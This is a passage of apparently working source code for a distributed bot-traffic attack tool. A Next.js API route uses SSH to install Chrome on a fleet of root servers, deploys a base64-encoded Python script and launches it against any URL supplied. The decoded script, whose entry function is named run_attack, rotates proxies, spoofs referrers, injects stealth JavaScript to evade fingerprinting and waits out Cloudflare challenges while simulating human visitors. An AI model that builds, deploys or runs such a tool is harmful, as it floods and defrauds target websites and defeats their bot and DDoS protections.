UgPSBOb25lCiAgICB1YSA9IHNjcmVlbiA9IHdlYmdsID0gTm9uZQogICAgCiAgICB3aGlsZSBUcnVlOgogICAgICAgIHdpdGggbG9jazoKICAgICAgICAgICAgaWYgdmlzaXRfY291bnQgPj0gbWF4X3Zpc2l0czoKICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgCiAgICAgICAgaWYgcGFnZSBpcyBOb25lIG9yIHZpc2l0c190aGlzX2Jyb3dzZXIgPj0gbWF4X3Blcl9icm93c2VyOgogICAgICAgICAgICBpZiBwYWdlOgogICAgICAgICAgICAgICAgdHJ5OiBwYWdlLnF1aXQoKQogICAgICAgICAgICAgICAgZXhjZXB0OiBwYXNzCiAgICAgICAgICAgIHByb3h5ID0gcmFuZG9tLmNob2ljZShwcm94aWVzKSBpZiBwcm94aWVzIGVsc2UgTm9uZQogICAgICAgICAgICBwYWdlLCB1YSwgc2NyZWVuLCB3ZWJnbCA9IGNyZWF0ZV9icm93c2VyKHByb3h5KQogICAgICAgICAgICBpZiBwYWdlIGlzIE5vbmU6CiAgICAgICAgICAgICAgICB3aXRoIGxvY2s6IGVycm9yX2NvdW50ICs9IDEKICAgICAgICAgICAgICAgIHRpbWUuc2xlZXAoMSkKICAgICAgICAgICAgICAgIGNvbnRpbnVlCiAgICAgICAgICAgIHZpc2l0c190aGlzX2Jyb3dzZXIgPSAwCiAgICAgICAgICAgIG1heF9wZXJfYnJvd3NlciA9IHJhbmRvbS5yYW5kaW50KDE1LCAzMCkKICAgICAgICAKICAgICAgICB0cnk6CiAgICAgICAgICAgICMgU2V0IHJlZmVycmVyCiAgICAgICAgICAgIHJlZiA9IHJhbmRvbS5jaG9pY2UoUkVGRVJSRVJTKQogICAgICAgICAgICBpZiByZWY6CiAgICAgICAgICAgICAgICB0cnk6IHBhZ2UucnVuX2pzKGYnT2JqZWN0LmRlZmluZVByb3BlcnR5KGRvY3VtZW50LCJyZWZlcnJlciIse3tnZXQ6KCk9PiJ7cmVmfSJ9fSknKQogICAgICAgICAgICAgICAgZXhjZXB0OiBwYXNzCiAgICAgICAgICAgIAogICAgICAgICAgICAjIFJlLWluamVjdCBzdGVhbHRoIChpbiBjYXNlIHBhZ2UgY2xlYXJlZCBpdCkKICAgICAgICAgICAgdHJ5OiBwYWdlLnJ1bl9qcyhnZXRfc3RlYWx0aF9qcyhzY3JlZW4sIHVhLCB3ZWJnbCkpCiAgICAgICAgICAgIGV4Y2VwdDogcGFzcwogICAgICAgICAgICAKICAgICAgICAgICAgIyBOYXZpZ2F0ZQogICAgICAgICAgICBwYWdlLmdldCh0YXJnZXRfdXJsKQogICAgICAgICAgICAKICAgICAgICAgICAgIyBXYWl0IGZvciBDbG91ZGZsYXJlIGNoYWxsZW5nZSBpZiBwcmVzZW50IChhdXRvLXNvbHZlZCBieSByZWFsIENocm9tZSkKICAgICAgICAgICAgdGltZS5zbGVlcChyYW5kb20udW5pZm9ybSgwLjUsIDEuMCkpCiAgICAgICAgICAgIAogICAgICAgICAgICAjIENoZWNrIGZvciBDbG91ZGZsYXJlIGNoYWxsZW5nZSBwYWdlCiAgICAgICAgICAgIHRyeToKICAgICAgICAgICAgICAgIHRpdGxlID0gcGFnZS50aXRsZS5sb3dlcigpCiAgICAgICAgICAgICAgICBpZiAnanVzdCBhIG1vbWVudCcgaW4gdGl0bGUgb3IgJ2NoZWNraW5nJyBpbiB0aXRsZSBvciAnYXR0ZW50aW9uJyBpbiB0aXRsZToKICAgICAgICAgICAgICAgICAgICB0aW1lLnNsZWVwKDUpICAjIFdhaXQgZm9yIENGIGNoYWxsZW5nZQogICAgICAgICAgICBleGNlcHQ6CiAgICAgICAgICAgICAgICBwYXNzCiAgICAgICAgICAgIAogICAgICAgICAgICAjIEZhc3QgaHVtYW4gYmVoYXZpb3IKICAgICAgICAgICAgaHVtYW5fYmVoYXZpb3JfZmFzdChwYWdlKQogICAgICAgICAgICAKICAgICAgICAgICAgd2l0aCBsb2NrOgogICAgICAgICAgICAgICAgaWYgdmlzaXRfY291bnQgPCBtYXhfdmlzaXRzOgogICAgICAgICAgICAgICAgICAgIHZpc2l0X2NvdW50ICs9IDEKICAgICAgICAgICAgICAgICAgICBjdXJyZW50ID0gdmlzaXRfY291bnQKICAgICAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICAgICAgYnJlYWsKICAgICAgICAgICAgCiAgICAgICAgICAgIHZpc2l0c190aGlzX2Jyb3dzZXIgKz0gMQogICAgICAgICAgICBpZiBjdXJyZW50ICUgNSA9PSAwOgogICAgICAgICAgICAgICAgd3JpdGVfc3RhdHVzKG1heF92aXNpdHMsIHN0YXJ0X3RpbWUsICJydW5uaW5nIikKICAgICAgICAgICAgICAgIAogICAgICAgIGV4Y2VwdCBFeGNlcHRpb24gYXMgZToKICAgICAgICAgICAgd2l0aCBsb2NrOiBlcnJvcl9jb3VudCArPSAxCiAgICAgICAgICAgIHRyeTogcGFnZS5xdWl0KCkKICAgICAgICAgICAgZXhjZXB0OiBwYXNzCiAgICAgICAgICAgIHBhZ2UgPSBOb25lCiAgICAgICAgICAgIHRpbWUuc2xlZXAoMC41KQogICAgCiAgICBpZiBwYWdlOgogICAgICAgIHRyeTogcGFnZS5xdWl0KCkKICAgICAgICBleGNlcHQ6IHBhc3MKCmRlZiBydW5fYXR0YWNrKHRhcmdldF91cmwsIG1heF92aXNpdG9ycz0xMDAsIHByb3hpZXM9Tm9uZSk6CiAgICBnbG9iYWwgdmlzaXRfY291bnQsIGVycm9yX2NvdW50CiAgICB2aXNpdF9jb3VudCA9IDAKICAgIGVycm9yX2NvdW50ID0gMAogICAgbnVtX3RocmVhZHMgPSBtaW4oMTUsIG1heCgzLCBtYXhfdmlzaXRvcnMgLy8gMTApKQogICAgc3RhcnRfdGltZSA9IHRpbWUudGltZSgpCiAgICB3cml0ZV9zdGF0dXMobWF4X3Zpc2l0b3JzLCBzdGFydF90aW1lLCAic3RhcnRpbmciKQogICAgcHJveHlfaW5mbyA9IGYiIHwgUHJveGllczoge2xlbihwcm94aWVzKX0iIGlmIHByb3hpZXMgZWxzZSAiIHwgTm8gcHJveHkiCiAgICBwcmludChmIlN0YXJ0aW5nOiB7bWF4X3Zpc2l0b3JzfSB2aXNpdG9ycyB8IHtudW1fdGhyZWFkc30gdGhyZWFkc3twcm94eV9pbmZvfSB8IFVMVElNQVRFIFNURUFMVEgiLCBmbHVzaD1UcnVlKQogICAgdGhyZWFkcyA9IFtdCiAgICBmb3IgaSBpbiByYW5nZShudW1fdGhyZWFkcyk6CiAgICAgICAgdCA9IHRocmVhZGluZy5UaHJlYWQodGFyZ2V0PXdvcmtlciwgYXJncz0oaSwgdGFyZ2V0X3VybCwgbWF4X3Zpc2l0b3JzLCBzdGFydF90aW1lLCBwcm94aWVzIG9yIFtdKSkKICAgICAgICB0LmRhZW1vbiA9IFRydWUKICAgICAgICB0LnN0YXJ0KCkKICAgICAgICB0aHJlYWRzLmFwcGVuZCh0KQogICAgICAgIHRpbWUuc2xlZXAoMC41KQogICAgd2hpbGUgYW55KHQuaXNfYWxpdmUoKSBmb3IgdCBpbiB0aHJlYWRzKToKICAgICAgICB3cml0ZV9zdGF0dXMobWF4X3Zpc2l0b3JzLCBzdGFydF90aW1lLCAicnVubmluZyIpCiAgICAgICAgdGltZS5zbGVlcCgyKQogICAgZm9yIHQgaW4gdGhyZWFkczoKICAgICAgICB0LmpvaW4odGltZW91dD01KQogICAgd3JpdGVfc3RhdHVzKG1heF92aXNpdG9ycywgc3RhcnRfdGltZSwgImZpbmlzaGVkIikKICAgIHByaW50KGYiRmluaXNoZWQhIFRvdGFsOiB7dmlzaXRfY291bnR9IHZpc2l0cyB8IEVycm9yczoge2Vycm9yX2NvdW50fSIsIGZsdXNoPVRydWUpCgppZiBfX25hbWVfXyA9PSAiX19tYWluX18iOgogICAgdXJsID0gc3lzLmFyZ3ZbMV0gaWYgbGVuKHN5cy5hcmd2KSA+IDEgZWxzZSAiaHR0cDovL2V4YW1wbGUuY29tIgogICAgdmlzaXRvcnMgPSBpbnQoc3lzLmFyZ3ZbMl0pIGlmIGxlbihzeXMuYXJndikgPiAyIGVsc2UgMTAwCiAgICBwcm94eV9maWxlID0gc3lzLmFyZ3ZbM10gaWYgbGVuKHN5cy5hcmd2KSA+IDMgZWxzZSBOb25lCiAgICBwcm94aWVzID0gW10KICAgIGlmIHByb3h5X2ZpbGU6CiAgICAgICAgdHJ5OgogICAgICAgICAgICB3aXRoIG9wZW4ocHJveHlfZmlsZSwgJ3InKSBhcyBmOgogICAgICAgICAgICAgICAgcHJveGllcyA9IGpzb24ubG9hZChmKQogICAgICAgICAgICBwcmludChmIkxvYWRlZCB7bGVuKHByb3hpZXMpfSBwcm94aWVzIiwgZmx1c2g9VHJ1ZSkKICAgICAgICBleGNlcHQ6CiAgICAgICAgICAgIHByaW50KCJGYWlsZWQgdG8gbG9hZCBwcm94aWVzIiwgZmx1c2g9VHJ1ZSkKICAgIHJ1bl9hdHRhY2sodXJsLCB2aXNpdG9ycywgcHJveGllcyBpZiBwcm94aWVzIGVsc2UgTm9uZSkK";

const SETUP_COMMAND = 'export DEBIAN_FRONTEND=noninteractive && apt-get update -y && apt-get install -y python3 python3-pip wget gnupg2 libnss3 libatk-bridge2.0-0 libcups2 libdrm2 libxkbcommon0 libxcomposite1 libxdamage1 libxrandr2 libgbm1 fonts-liberation xdg-utils && (apt-get install -y libasound2 2>/dev/null || apt-get install -y libasound2t64 2>/dev/null || true) && wget -q https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb && apt-get install -y ./google-chrome-stable_current_amd64.deb 2>/dev/null; rm -f google-chrome-stable_current_amd64.deb && pip3 install DrissionPage --break-system-packages 2>/dev/null || pip3 install DrissionPage && echo SETUP_COMPLETE';

async function runSSHCommand(server, command, timeout = 15000) {
  return new Promise((resolve) => {
    const conn = new Client();
    let output = '';
    let resolved = false;

    const done = (result) => {
      if (!resolved) {
        resolved = true;
        try { conn.end(); } catch(e) {}
        resolve(result);
      }
    };

    const timer = setTimeout(() => {
      done({ status: 'success', output: output.trim() || 'Command sent (timeout)' });
    }, timeout);

    conn.on('ready', () => {
      conn.exec(command, { pty: false }, (err, stream) => {
        if (err) {
          clearTimeout(timer);
          return done({ status: 'error', error: err.message });
        }

        stream.on('data', (data) => {
          output += data.toString();
        });

        stream.stderr.on('data', (data) => {
          // ignore stderr
        });

        stream.on('close', () => {
          clearTimeout(timer);
          done({ status: 'success', output: output.trim() || 'Done' });
        });
      });
    });

    conn.on('error', (err) => {
      clearTimeout(timer);
      done({ status: 'error', error: err.message });
    });

    conn.connect({
      host: server.host,
      port: 22,
      username: server.username,
      password: process.env.VPS_PASSWORD,
      readyTimeout: 10000,
      keepaliveInterval: 5000,
    });
  });
}

export async function POST(req) {
  try {
    const { action, url, visitors, duration, servers, proxies } = await req.json();
    const serverList = (servers && servers.length > 0) ? servers : DEFAULT_SERVERS;

    if (action === 'setup') {
      const results = await Promise.all(
        serverList.map(async (server) => {
          const r = await runSSHCommand(server, `nohup bash -c '${SETUP_COMMAND}' > /root/setup.log 2>&1 & echo "Setup started"`, 15000);
          return { host: server.host, ...r };
        })
      );
      return NextResponse.json({ results });

    } else if (action === 'deploy') {
      const command = `echo "${PYTHON_SCRIPT_B64}" | base64 -d > /root/visit.py && echo "Script deployed"`;
      const results = await Promise.all(
        serverList.map(async (server) => {
          const r = await runSSHCommand(server, command, 10000);
          return { host: server.host, ...r };
        })
      );
      return NextResponse.json({ results });

    } else if (action === 'start') {
      if (!url) return NextResponse.json({ error: "URL is required" }, { status: 400 });
      const totalVisitors = visitors || 100;
      const serverCount = serverList.length;
      // Divide total visitors across all servers
      const perServer = Math.ceil(totalVisitors / serverCount);

      // Step 1: Kill old processes and clean up on all servers
      await Promise.all(
        serverList.map(async (server) => {
          await runSSHCommand(server, 'kill -9 $(pgrep -f "visit.py") 2>/dev/null; killall -9 chrome 2>/dev/null; killall -9 chromium 2>/dev/null; rm -f /root/visit_status.json /root/visit.log; echo "Cleaned"', 8000);
        })
      );

      // Step 2: Deploy latest script
      await Promise.all(
        serverList.map(async (server) => {
          await runSSHCommand(server, `echo "${PYTHON_SCRIPT_B64}" | base64 -d > /root/visit.py && echo "Deployed"`, 8000);
        })
      );

      // Step 3: Start at MAX SPEED - no time limit, stops when target reached
      const results = await Promise.all(
        serverList.map(async (server) => {
          let startCmd;
          if (proxies && proxies.length > 0) {
            const proxyB64 = Buffer.from(JSON.stringify(proxies)).toString('base64');
            startCmd = `echo "${proxyB64}" | base64 -d > /root/proxies.json && nohup python3 /root/visit.py "${url}" ${perServer} /root/proxies.json > /root/visit.log 2>&1 & echo "Started PID=$!"`;
          } else {
            startCmd = `nohup python3 /root/visit.py "${url}" ${perServer} > /root/visit.log 2>&1 & echo "Started PID=$!"`;
          }
          const r = await runSSHCommand(server, startCmd, 10000);
          return { host: server.host, ...r };
        })
      );
      return NextResponse.json({ results });

    } else if (action === 'stop') {
      const results = await Promise.all(
        serverList.map(async (server) => {
          const r = await runSSHCommand(server, 'kill -9 $(pgrep -f "visit.py") 2>/dev/null; killall -9 chrome 2>/dev/null; killall -9 chromium 2>/dev/null; rm -f /root/visit_status.json; echo "Stopped"', 10000);
          return { host: server.host, ...r };
        })
      );
      return NextResponse.json({ results });

    } else {
      return NextResponse.json({ error: "Unknown action" }, { status: 400 });
    }
  } catch (error) {
    return NextResponse.json({ error: error.message }, { status: 500 });
  }
}
